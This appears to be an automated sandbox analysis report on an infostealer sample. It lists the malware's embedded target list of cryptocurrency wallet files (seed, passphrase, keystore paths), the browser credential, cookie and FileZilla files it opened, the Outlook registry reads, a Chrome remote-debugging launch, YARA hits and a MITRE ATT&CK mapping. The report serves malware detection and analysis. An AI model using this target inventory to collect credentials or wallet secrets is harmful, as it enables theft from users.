Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: \ElectronCash\wallets\
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: Jaxx Desktop (old)
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: \Exodus\exodus.wallet\
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: info.seco
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: \jaxx\Local Storage\
Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\passphrase.jsonq
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: Exodus\exodus.wallet
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.jsonK+
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: file__0.localstorage
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D54000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: \Exodus\exodus.wallet\
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: MultiDoge
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: seed.seco
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*
Source: C:\Users\user\Desktop\random(1).exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\random(1).exe; File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\Desktop\random(1).exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\random(1).exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\random(1).exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\random(1).exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match; File source: 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR

              Remote Access Functionality

Source: C:\Users\user\Desktop\random(1).exe; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: Yara match; File source: 00000000.00000002.2013235084.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.1728661894.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2013442010.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
Source: C:\Users\user\Desktop\random(1).exe; Code function: 0_2_6C670C40 sqlite3_bind_zeroblob, 0_2_6C670C40
Source: C:\Users\user\Desktop\random(1).exe; Code function: 0_2_6C670D60 sqlite3_bind_parameter_name, 0_2_6C670D60
Source: C:\Users\user\Desktop\random(1).exe; Code function: 0_2_6C598EA0 sqlite3_clear_bindings, 0_2_6C598EA0
Source: C:\Users\user\Desktop\random(1).exe; Code function: 0_2_6C670B40 sqlite3_bind_value, sqlite3_bind_int64, sqlite3_bind_double, sqlite3_bind_zeroblob, 0_2_6C670B40
Source: C:\Users\user\Desktop\random(1).exe; Code function: 0_2_6C596410 bind, WSAGetLastError, 0_2_6C596410
Source: C:\Users\user\Desktop\random(1).exe; Code function: 0_2_6C59C050 sqlite3_bind_parameter_index, strlen, strncmp, strncmp, 0_2_6C59C050
Source: C:\Users\user\Desktop\random(1).exe; Code function: 0_2_6C596070 PR_Listen, 0_2_6C596070
Source: C:\Users\user\Desktop\random(1).exe; Code function: 0_2_6C59C030 sqlite3_bind_parameter_count, 0_2_6C59C030
Source: C:\Users\user\Desktop\random(1).exe; Code function: 0_2_6C5960B0 listen, WSAGetLastError, 0_2_6C5960B0
Source: C:\Users\user\Desktop\random(1).exe; Code function: 0_2_6C5222D0 sqlite3_bind_blob, 0_2_6C5222D0
Source: C:\Users\user\Desktop\random(1).exe; Code function: 0_2_6C5963C0 PR_Bind, 0_2_6C5963C0
MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the count of matched signatures for that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 2 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 24 Virtualization/Sandbox Evasion; 1 Disable or Modify Tools; 2 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 System Time Discovery; 641 Security Software Discovery; 24 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 File and Directory Discovery; 236 System Information Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Email Collection; 1 Archive Collected Data; 4 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 21 Encrypted Channel; 1 Remote Access Software; 12 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement